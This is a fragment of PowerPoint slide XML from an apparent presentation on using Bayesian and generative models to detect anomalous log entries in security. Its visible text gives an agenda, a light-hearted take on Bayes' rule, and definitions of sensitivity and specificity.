            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Using Generative model</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="em animation v3 (convert-video-online.com) (1)">
            <a:hlinkClick r:id="" action="ppaction://media"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{984E4AD5-9558-4960-B929-2D12751D5848}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <a:videoFile r:link="rId2"/>
            <p:extLst>
              <p:ext uri="{DAA4B4D4-6D71-4841-9C94-3DE7FCFB9230}">
                <p14:media xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" r:embed="rId1"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1374540" y="3351891"/>
            <a:ext cx="4853969" cy="2730788"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3019339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50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25285" y="842138"/>
            <a:ext cx="2280234"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Author name her</a:t>
            </a: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pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11"/>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17" name="TextBox 16"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18692E09-154C-4B97-9EAF-B59B5963CE37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1486183"/>
            <a:ext cx="12344400" cy="6189345"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D6B8D1E-73BA-4E1F-97DF-28F044CCB29E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="2120380"/>
            <a:ext cx="9144000" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SO WHO IS THIS BAYES GUY THAT IS GOING TO SOLVE ALL OUR PROBLEMS? </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="11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pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 6" descr="Image result for photo of charlie sheen and bayes">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03CE4E3F-DF54-4593-80A3-5AF8FE47C7B0}"/>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7530" t="9383" r="56818" b="31691"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3717878" y="3146220"/>
            <a:ext cx="1731645" cy="214884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8" name="Picture 17" descr="Image result for photo of charlie sheen and bayes">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9029C24E-57B4-403B-B51B-889ECD6C33B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:grayscl/>
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="57772" t="9383" r="6577" b="31691"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6312488" y="3146220"/>
            <a:ext cx="1731645" cy="214884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9F816EF1-9EAF-429B-ABD5-4A5A7B2C6013}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3504518" y="5410030"/>
            <a:ext cx="2156460" cy="263606"/>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Thomas Bayes (1702-1761)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66C1D940-B1DD-45DD-A391-F6B723BE1E1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6088649" y="5410030"/>
            <a:ext cx="2204421" cy="577081"/>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Charlie Sheen (1965-present)</a:t>
            </a:r>
          </a:p>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The Movie:</a:t>
            </a:r>
          </a:p>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“Return of Thomas Bayes”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60333234-D0C5-43F3-AC45-678AA60BD5D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1302261" y="6214899"/>
            <a:ext cx="9046722" cy="276999"/>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My new belief </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>∝</a:t>
            </a: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 What I am actually seeing x What I believed before</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18987330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9CF664A5-5490-4425-8156-3F4009090781}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1469948"/>
            <a:ext cx="11916577" cy="5974839"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>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22" name="TextBox 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F90482EA-11AB-45B2-A960-F3D84341E299}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="239383" y="3664749"/>
            <a:ext cx="1894659" cy="371759"/>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Introduction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F459C4C6-1F71-403D-B96F-C44DA1491562}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8373640" y="4496328"/>
            <a:ext cx="1894659" cy="608331"/>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Getting to </a:t>
            </a:r>
          </a:p>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grips</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88DA9458-EAEC-49CA-AA3F-4A72078E7BE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1880864" y="4564862"/>
            <a:ext cx="1894659" cy="608331"/>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Important terms</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1A53DCD-F9F0-47C0-97F7-6F7B9F18F70E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6757419" y="3693361"/>
            <a:ext cx="1894659" cy="371759"/>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The future</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE0921E7-76F1-4D13-8341-EB05A67723A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3520771" y="3669527"/>
            <a:ext cx="1894659" cy="608331"/>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The security problem</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9958980-F7ED-4E83-BF72-AB1D0F1F0B2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5156265" y="4511996"/>
            <a:ext cx="1894659" cy="253916"/>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A tool, not a solution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75F7928E-6A9E-49B4-8DB1-85C5E02D51C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9996617" y="3712126"/>
            <a:ext cx="2096929" cy="371759"/>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Recommendations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="TextBox 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E512FB6A-E241-4D5A-A2AB-12F878EBED22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="651352" y="1786856"/>
            <a:ext cx="3026004" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SO, HOW GOOD IS IT?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30" name="Picture 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CDF033A-3148-4E26-94D1-1A5A112830E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="689563" y="2272510"/>
            <a:ext cx="2717551" cy="3841349"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="31" name="Picture 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03F00188-3A8F-45BC-8799-1792B73B238F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4351888" y="2382629"/>
            <a:ext cx="4726682" cy="1842605"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="TextBox 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D94583ED-F755-48A6-96E6-7654E3B97779}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4326190" y="4390244"/>
            <a:ext cx="5375183" cy="1615827"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Sensitivity:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> (also called the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>true positive rate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) measures the proportion of actual positives that are correctly identified as such (e.g., the percentage of anomalous log entries which are correctly identified as anomalous).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="1100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="222222"/>
              </a:solidFill>
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Specificity:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> (also called the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>true negative rate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) measures the proportion of actual negatives that are correctly identified as such (e.g., the percentage of log entries which are  correctly identified as not being anomalous).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="TextBox 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BB1982E-E46B-461C-9FAE-E14CE302E383}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4351888" y="6217598"/>
            <a:ext cx="6195044" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>By FeanDoe - Modified version from Walber's Precision and Recall https://commons.wikimedia.org/wiki/File:Precisionrecall.svg, CC BY-SA 4.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>https://commons.wikimedia.org/w/index.php?curid=65826093</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1082577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25285" y="842138"/>
            <a:ext cx="2280234"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Author name her</a:t>
            </a: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pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11"/>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17" name="TextBox 16"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42173967-F173-409B-B865-74D38968B1C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:grayscl/>
          </a:blip>
          <a:srcRect t="7846" b="28401"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="1486184"/>
            <a:ext cx="12191999" cy="6112932"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCA677BA-1632-41A0-8E6E-A5D079D7F88A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix amt="51000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1486184"/>
            <a:ext cx="6121939" cy="6112932"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5C7C769-A856-49C5-BE67-83A18347512B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="952108" y="5021903"/>
            <a:ext cx="2611224" cy="770157"/>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r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Most current solutions are deployed in the wrong place in the wrong way!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E41F60E-BF05-4F4D-BB4B-1521EA559D38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="622169" y="2046773"/>
            <a:ext cx="3801241" cy="954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="457166"/>
